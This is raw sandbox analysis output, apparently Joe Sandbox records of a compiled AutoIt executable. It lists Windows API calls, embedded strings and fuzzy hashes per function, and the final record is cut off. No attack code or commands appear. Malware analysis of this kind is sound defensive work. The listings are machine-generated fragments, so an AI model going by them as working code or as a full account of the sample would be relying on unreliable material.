                                                    • Part of subcall function 00BC434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC4415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: (l$This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3556933902
                                                  • Opcode ID: 3a5174ef5565e9f6987ef734a1ac0c62a4f1031d649862ece7f8b88119aacdca
                                                  • Instruction ID: f3001383ba4d8498d515d73420788269edd76abb557276aa0452ad650dc473d3
                                                  • Opcode Fuzzy Hash: 3a5174ef5565e9f6987ef734a1ac0c62a4f1031d649862ece7f8b88119aacdca
                                                  • Instruction Fuzzy Hash: 1551B270A48208AACF11EBB4DC55FAE7BF9EB45714F4080EDF411A61A2DEB05645CB25

                                                  Control-flow Graph

                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00BC49CD
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • GetCurrentProcess.KERNEL32(?,00C4FAEC,00000000,00000000,?), ref: 00BC4A9A
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00BC4AA1
                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BC4AE7
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00BC4AF2
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BC4B23
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00BC4B2F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: 0b6599d17d22f29dc7f6a98ae06e81d8c82c1929f36639aa5dfbbb1b5a21335f
                                                  • Instruction ID: f4466dbbed24a7c0cdf54ba444cfc99202ecf96717aa7dfac2a0737eefa937e2
                                                  • Opcode Fuzzy Hash: 0b6599d17d22f29dc7f6a98ae06e81d8c82c1929f36639aa5dfbbb1b5a21335f
                                                  • Instruction Fuzzy Hash: 1391C8319897C4DEC731DB6885A06AAFFF5AF3A300B4849DDE0C797A41D720A90CD759

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00BC4D8E,?,?,00000000,00000000), ref: 00BC4E99
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BC4D8E,?,?,00000000,00000000), ref: 00BC4EB0
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F), ref: 00BFD937
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F), ref: 00BFD94C
                                                  • LockResource.KERNEL32(00BC4D8E,?,?,00BC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00BC4E2F,00000000), ref: 00BFD95F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 5133cedf063f58f81d44ba8347eadd584e19f3ba5409af72242c2c5031bbbaf4
                                                  • Instruction ID: 09352f5bf6e8f90cdc86c7ab19c1c00b76958be6b5cf3c0af188e7242eda2b84
                                                  • Opcode Fuzzy Hash: 5133cedf063f58f81d44ba8347eadd584e19f3ba5409af72242c2c5031bbbaf4
                                                  • Instruction Fuzzy Hash: 10115E75240701BFD7258B65EC48F6B7BBAFBC6B11F1082ACF54586250DBA1E9018670
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID:
                                                  • API String ID: 3964851224-0
                                                  • Opcode ID: c500cc2d3b12066f43bdbac64691f0a55ea714febf844c080a662a882544003e
                                                  • Instruction ID: 1189391afe3c38577730b87bea62c465fafe9a2649d1db32da9e4a6b0a86fe27
                                                  • Opcode Fuzzy Hash: c500cc2d3b12066f43bdbac64691f0a55ea714febf844c080a662a882544003e
                                                  • Instruction Fuzzy Hash: 6A9259706183419FD724EF14C480B2ABBE1FF89304F1489ADE99A9B391E771ED45CB92
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00BFE398), ref: 00C2446A
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00C2447B
                                                  • FindClose.KERNEL32(00000000), ref: 00C2448B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
                                                  • Instruction ID: 5261f7a122fc85678d365230f6f6c7710db94d7e3140480e493e8026a984954c
                                                  • Opcode Fuzzy Hash: d697dac13cfdbce210c3c89527a554ba4e1d44fd010e20f5f718289bd9165e17
                                                  • Instruction Fuzzy Hash: 67E0D8364109106B4214BB38FC0D6EE775CAE06335F10071AF935C10E0E7B459009595
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.$X+
                                                  • API String ID: 0-3997231420
                                                  • Opcode ID: da34258fd8c3ee8aa55e6a3b0f17bfe8d7a54b0c10bc421a61f9cadad49d6758
                                                  • Instruction ID: 2856009045781e37f0355407c42d5f4a30bc6e560d465f6e68d687db5db39066
                                                  • Opcode Fuzzy Hash: da34258fd8c3ee8aa55e6a3b0f17bfe8d7a54b0c10bc421a61f9cadad49d6758
                                                  • Instruction Fuzzy Hash: 07A23675A00216CFCB24CF58C480FAAB7F6FB59314F2481ADE926AB251D775ED42CB90
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0A5B
                                                  • timeGetTime.WINMM ref: 00BD0D16
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD0E53
                                                  • Sleep.KERNEL32(0000000A), ref: 00BD0E61
                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00BD0EFA
                                                  • DestroyWindow.USER32 ref: 00BD0F06
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD0F20
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00C04E83
                                                  • TranslateMessage.USER32(?), ref: 00C05C60
                                                  • DispatchMessageW.USER32(?), ref: 00C05C6E
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C05C82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4212290369-3242690629
                                                  • Opcode ID: b27303eeef29f0a7d81b6d7eea645242a354ccd7b4bf39d98baaf813ce8bf743
                                                  • Instruction ID: 0e3ec9da409fab8979d8fda4305abfd7ba4b519ddb6c9451186ba7d14f5c1c94
                                                  • Opcode Fuzzy Hash: b27303eeef29f0a7d81b6d7eea645242a354ccd7b4bf39d98baaf813ce8bf743
                                                  • Instruction Fuzzy Hash: F4B2BD70608741DFD728DB24C884BAFB7E5FF84304F14496EE49A972A1DB71E984CB92

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00C28F5F: __time64.LIBCMT ref: 00C28F69
                                                    • Part of subcall function 00BC4EE5: _fseek.LIBCMT ref: 00BC4EFD
                                                  • __wsplitpath.LIBCMT ref: 00C29234
                                                    • Part of subcall function 00BE40FB: __wsplitpath_helper.LIBCMT ref: 00BE413B
                                                  • _wcscpy.LIBCMT ref: 00C29247
                                                  • _wcscat.LIBCMT ref: 00C2925A
                                                  • __wsplitpath.LIBCMT ref: 00C2927F
                                                  • _wcscat.LIBCMT ref: 00C29295
                                                  • _wcscat.LIBCMT ref: 00C292A8
                                                    • Part of subcall function 00C28FA5: _memmove.LIBCMT ref: 00C28FDE
                                                    • Part of subcall function 00C28FA5: _memmove.LIBCMT ref: 00C28FED
                                                  • _wcscmp.LIBCMT ref: 00C291EF
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29824
                                                    • Part of subcall function 00C29734: _wcscmp.LIBCMT ref: 00C29837
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C29452
                                                  • _wcsncpy.LIBCMT ref: 00C294C5
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00C294FB
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C29511
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29522
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C29534
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: cef6b74faffd19b28c42e65548128301a562a178155ac8a1785c9cb5862d215f
                                                  • Instruction ID: e8c73226940fd695e4f49ccfeb5bb617bc6f8a74cb086ad02238a0a976ec4d78
                                                  • Opcode Fuzzy Hash: cef6b74faffd19b28c42e65548128301a562a178155ac8a1785c9cb5862d215f
                                                  • Instruction Fuzzy Hash: F5C14CB1D00229AADF21DFA5DC85EDEBBBDEF45310F0040AAF609E7151DB709A848F65

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00BC4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,(l,?,00BC37AE,?), ref: 00BC4724
                                                    • Part of subcall function 00BE050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BC7165), ref: 00BE052D
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BC71A8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BFE8C8
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BFE909
                                                  • RegCloseKey.ADVAPI32(?), ref: 00BFE947
                                                  • _wcscat.LIBCMT ref: 00BFE9A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$U
                                                  • API String ID: 2673923337-1615094722
                                                  • Opcode ID: e78a57e17c97f4189cdb9666c1403d753f6936db033d3ab304375eb9da25c7a9
                                                  • Instruction ID: 23299457bd91268dcfa17f7599a5fc747e403c8de990f3e8891d48ae5aa55fb7
                                                  • Opcode Fuzzy Hash: e78a57e17c97f4189cdb9666c1403d753f6936db033d3ab304375eb9da25c7a9
                                                  • Instruction Fuzzy Hash: A77169715083059AC710EF25EC81B6FBBE8FF89350F4049AEF545871A0DB71A949CBA6

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 6e7ab06ca50c8db9005647b9cb3b967ee3a4ae1aa5ff87b415ff5bef25d4cac4
                                                  • Instruction ID: 66a58577e0a97d7b09fd14313741c2aee6c578a7b0b9849a011117e8b647233b
                                                  • Opcode Fuzzy Hash: 6e7ab06ca50c8db9005647b9cb3b967ee3a4ae1aa5ff87b415ff5bef25d4cac4
                                                  • Instruction Fuzzy Hash: 113126B6D41208EFDB10CFA4E888BDEBBF0FB09314F14412EE580A62A1D7B54586CF95

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                  • RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                  • LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 448990871da013200c589cb4dd8f2c6191b668ce0a8b9e41445323f81bb85b96
                                                  • Instruction ID: 9cd2d3e9a4c7955cc70fd92fbb07dedc0f1badb1ac1f774f37890b04634c4fe6
                                                  • Opcode Fuzzy Hash: 448990871da013200c589cb4dd8f2c6191b668ce0a8b9e41445323f81bb85b96
                                                  • Instruction Fuzzy Hash: 7321D6B9D51218AFDB00DFA4EC89BDEBBF4FB09700F00412AF910A62A0D7B54545CF95

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00BC3A50
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00BC3A5F
                                                  • LoadIconW.USER32(00000063), ref: 00BC3A76
                                                  • LoadIconW.USER32(000000A4), ref: 00BC3A88
                                                  • LoadIconW.USER32(000000A2), ref: 00BC3A9A
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC3AC0
                                                  • RegisterClassExW.USER32(?), ref: 00BC3B16
                                                    • Part of subcall function 00BC3041: GetSysColorBrush.USER32(0000000F), ref: 00BC3074
                                                    • Part of subcall function 00BC3041: RegisterClassExW.USER32(00000030), ref: 00BC309E
                                                    • Part of subcall function 00BC3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC30AF
                                                    • Part of subcall function 00BC3041: InitCommonControlsEx.COMCTL32(?), ref: 00BC30CC
                                                    • Part of subcall function 00BC3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BC30DC
                                                    • Part of subcall function 00BC3041: LoadIconW.USER32(000000A9), ref: 00BC30F2
                                                    • Part of subcall function 00BC3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BC3101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 62c4d82277dfead568aa08beb07c6a068be2cbabea8fc931a0a4fbb4441925c2
                                                  • Instruction ID: a3f1ae5c7168d0b252a4f6de86c6b78c53c243a0af8776d7e7b36f21f60e9d26
                                                  • Opcode Fuzzy Hash: 62c4d82277dfead568aa08beb07c6a068be2cbabea8fc931a0a4fbb4441925c2
                                                  • Instruction Fuzzy Hash: 33213575900308AFEB10DFA4EC49B9D7BF0FB09711F00416AE500AA2A1DBB95A508F88

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: (l$/AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3920092937
                                                  • Opcode ID: e5a32b8e116c40df0db642be7e5114e79aa54e8d53018545efcad2402d803ef9
                                                  • Instruction ID: 3e2f363b0e45fde1eb0d442e02c759501e98cf247aee27fcc03aded67995d445
                                                  • Opcode Fuzzy Hash: e5a32b8e116c40df0db642be7e5114e79aa54e8d53018545efcad2402d803ef9
                                                  • Instruction Fuzzy Hash: 70A1397290022D9ADB14EBA0DC95FEEB7F9BF14710F4044ADE416B7191DF745A08CBA0

                                                  Control-flow Graph

                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00BC36D2
                                                  • KillTimer.USER32(?,00000001), ref: 00BC36FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC372A
                                                  • CreatePopupMenu.USER32 ref: 00BC373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00BC374D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 5eee9def25b6d725fc95b3a94a463c6fda1a6f754011148a38add33056687a5f
                                                  • Instruction ID: 5d05e1d8342a7b7ce4431e9bb92dc21f8e930661392eba64614918e40703064a
                                                  • Opcode Fuzzy Hash: 5eee9def25b6d725fc95b3a94a463c6fda1a6f754011148a38add33056687a5f
                                                  • Instruction Fuzzy Hash: 564166F1204509BBCB106F78EC49F7D37E5EB01700F9481BEF602922A1CEA49E0593A9

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F5C6B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F5C8D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
